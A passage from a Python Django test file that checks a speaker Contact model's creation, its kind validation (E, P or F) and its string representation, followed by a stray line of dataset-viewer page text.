speaker=self.speaker,
kind='F',
value='21-123456789'
)
self.assertEqual(1, contact.pk)
def test_kind(self):
"""
Contact kind must be limited to E, P or F.
"""
contact = Contact(speaker=self.speaker, kind='A', value='B')
self.assertRaises(ValidationError, contact.full_clean)
def test_unicode(self):
"""
Contact string representation should be value.
"""
contact = Contact(
speaker=self.speaker,
kind='E',
value='davivcgarcia@gmail.com')
self.assertEqual(u'davivcgarcia@gmail.com', unicode(contact))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.